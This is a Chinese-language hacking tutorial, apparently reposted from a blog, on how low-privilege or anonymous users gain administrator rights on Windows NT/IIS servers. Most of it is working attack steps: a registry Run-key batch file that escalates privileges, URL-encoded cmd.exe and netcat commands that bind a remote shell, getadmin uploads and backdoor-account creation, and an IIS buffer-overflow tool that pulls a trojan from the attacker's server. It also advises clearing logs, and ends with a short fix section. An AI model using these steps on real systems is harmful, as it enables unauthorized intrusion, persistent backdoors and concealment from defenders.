涉及程序：?
NT server?

描述：?
一般用戶獲取NT服務器Admin權限的方法

詳細：?
獲取NT的admin權限的方法:
一、通過修改注冊表
凡是具有登錄NT本機的用戶，例如IUSR_machine，都具有對 HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run 項的可讀可寫權限，該用戶可以遠程訪問這個項。比如，他可以創建一個bat文件，文件內容為: cmd.exe /c net localgroup administrators?
IUSR_machine /add，把該文件copy到winnt目錄下，然后在注冊表上述的項添加一個數值，指向這個文件。
那么，當下次Admin登錄到該機器上時，就會自動把IUSR_machine添加到Administrators組。
另，注冊表鍵HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Startup 也可以這么做。

二、自建telnet服務在NT上執行指令
要求用戶有文件上傳權限，而且該目錄位于web目錄下，該目錄允許執行
下面是具體步驟
假設你的目錄是www.xxx.com/frankie
那么,把cmd.exe(位于C:\winnt\system32\cmd.exe)和Netcat里面包含的nc.exe傳到這個目錄上去，
然后,在瀏覽器端輸入:
http://www.xxx.com/frankie/cmd.exe?/c%20nc.exe%20-l%20-p%2023%20-t%20-e%20cmd.exe
這時候,你的瀏覽器將停止不動,實際上,server上的Telnet的服務已經產生了:
這時,用Telnet連接www.xxx.com的23端口,你發現,不用密碼,不用登陸,對方C:\提示符已經出現在你的眼前!更妙的是,這個Telnet server是一個一次性的服務,當客戶端一退出,該服務也將終止.
Netcat不同于一般的特洛伊木馬,它可以構建任何的TCP連接服務.在瀏覽器端輸入上述的字符串,等價于在NT的Dos方式下輸入: nc -l -p 23 -t?

-e cmd.exe 這將把cmd.exe綁定到23端口上

三、入侵NTserver典型途徑V2.0
簡介
1、如果你有NT/IIS服務器的任何一個帳號,哪怕是guest帳號,都可以獲得root
2、用netcat和iishack可以獲得root
3、iusr_計算機名這個帳號有ftp上傳,web執行等權限.
4、在web server上執行程序是入侵NT的關鍵
5、要在web server上執行程序就先要上傳文件到cgi-bin目錄或者scripts目錄等有執行權限的目錄上去
在本文中,目標機器的名稱是ntsvr2,目標機器的域名是www.xxx.com,目標機器上有scripts和cgi-bin目錄,scripts目錄下有uploadn.asp等asp

程序,可能有guest帳號,肯定有iusr_ntsvr2這個帳號:
第一個方法,用iusr_ntsvr2后者guest這兩個帳號,這里假設我們已經破解了這個帳號的密碼:
在瀏覽器輸入:
http://www.xxx.com/scripts/uploadn.asp
guest和iusr_ntsvr2這兩個帳號都可以進這個asp頁面
在這里把文件getadmin和gasys.dll以及cmd.exe上傳到/scripts目錄.
然后輸入:http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2
大約十多秒后屏幕顯示:
CGI Error?
這時有90%的可能是:你已經把IUSR_ntsvr2升級為Administrator,也就是任何訪問該web站的人都是管理員
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add?
這樣就創建了一個叫china用戶,密碼是news,然后:
http://www.xxx.com/scripts/getadmin.exe?china
第二個方法,用匿名ftp:
如果允許匿名帳號ftp登陸的設定,也給我們帶來了突破NT server的機會。我們用ftp登陸一個NT server,比如:www.xxx.com(示例名):
ftp www.xxx.com
Connected to www.xxx.com
220 ntsvr2 Microsoft FTP Service (Version 3.0).?
ntsvr2這個東西暴露了其NETbios名,那么在IIS的背景下,必然會有一個IUSR_ntsvr2的用戶帳號,屬于Domain user組，這個帳號我們以后要用來

獲取Administrator的權限
User (www.xxx.com:(none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.?
Password: 輸入 guest@ 或者guest
對于缺乏網絡安全知識的管理員來說,很多人沒有將guest帳號禁止,或者沒有設置密碼。那么guest帳號就是一個可用的正確的用戶帳號，雖然

只屬于Domain guest組
在這種情況下我們就可以進NT server的ftp了。
進去以后,看看目錄列表,試試 cd /scripts 或cgi-bin等關鍵目錄,如果運氣好,改變目錄成功，這時你就有了80%的把握。
把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll傳上去到cgi-bin
然后輸入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2
大約十多秒后屏幕顯示:
CGI Error?
這時有90%的可能是:你已經把IUSR_ntsvr2升級為Administrator,也就是任何訪問該web站的人都是管理員
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add?
這樣就創建了一個叫china用戶,密碼是news,然后:
http://www.xxx.com/cgi-bin/getadmin.exe?china
或者
http://www.xxx.com/scripts/tools/getadmin.exe?china
你再用china的帳號登陸,就可以有最大的權限了,也可以用上面的cmd.exe的方法直接修改 如果沒有cmd.exe,也可以自己傳一個上去到

scripts/tools或者cgi-bin目錄

第三個方法,用netcat和iishack
如果你熟悉使用Netcat這個工具,你就知道,netcat可以利用NT的弱點在其上綁定端口,下面用eEye的工具已經介紹過,如果你熟悉Netcat,成功的可能性會更大:

IIS的ISAPI的毛病(*.HTR) 我們再來看看eEye最近這兩天發現的一個關于NT/IIS的問題和工具.在IIS的/Inetsrv目錄下,有個DLL文件叫

ism.dll,這個模塊在web運行的時候就被加載到較高的內存地址,并且導致了零字節問題到處出現
IIShack.asm ,利用這個毛病,eEye寫了兩個程序:?
iishack.exe
ncx99.exe,為達目的你必須自己有一個web server,把ncx99.exe和

netbus木馬傳到這個web server的目錄下,比如你的web server是:
www.mysvr.com? 而對方的IIS server是www.xxx.com
則: iishack www.xxx.com 80 www.mysvr.com/ncx99.exe?? (注意,不要加http://字符!)
上述命令輸入后這時你應該可以看到?
------(IIS 4.0 remote buffer overflow exploit)-----------------
(c) dark spyrit -- barns@eeye.com.
http://www.eEye.com
[usage: iishack <host> <port> <url> ]
eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe
do not include 'http://' before hosts!
---------------------------------------------------------------
Data sent!

然后,再把Netbus等特洛伊木馬傳到對方機器上去:
iishack www.example.com 80 www.myserver.com/netbus.exe
ncx99.exe實際上是有名的Netcat的變種,它把對方server的cmd.exe綁定到Telnet服務
ncx.exe 這是較早的版本,是把端口綁到80的,由于80端口跑web服

務,端口已經被使用.所以可能不一定有效
然后,用Telnet到對方的99或80端口:
Telnet www.xxx.com 99?
結果是這樣:
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\>[You have full access to the system, happy browsing :)]
C:\>[Add a scheduled task to restart inetinfo in X minutes]
C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes]
C:\>[Clean up any trace or logs we might have left behind.]

這樣,你就完全控制了其硬盤上的文件!注意,如果你type exit退出,對方server上的這個進程也會退出
參考資料: eeye.zip

補救方法:在IIS的www service屬性中將主目錄的應用程序設置的*.htr的映射刪除
微軟對這個問題的正式回應

其它:用Retina.exe得到NT域內的帳號清單,逐個嘗試這些帳號,如果有的密碼薄弱而被你猜出來,就可以用上面的方法來獲取NT的admin
不明白的地方請看黑客世界最新更新的有關NT的系列文章
版權屬于CCSDT&Frankie所有?

解決方案：?
控制一般用戶對注冊表Run項的可寫權限
打最新的Services Pack

轉載于:https://www.cnblogs.com/starspace/archive/2009/01/14/1375521.html

總結

以上是生活随笔為你收集整理的获取NT的admin权限的方法的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。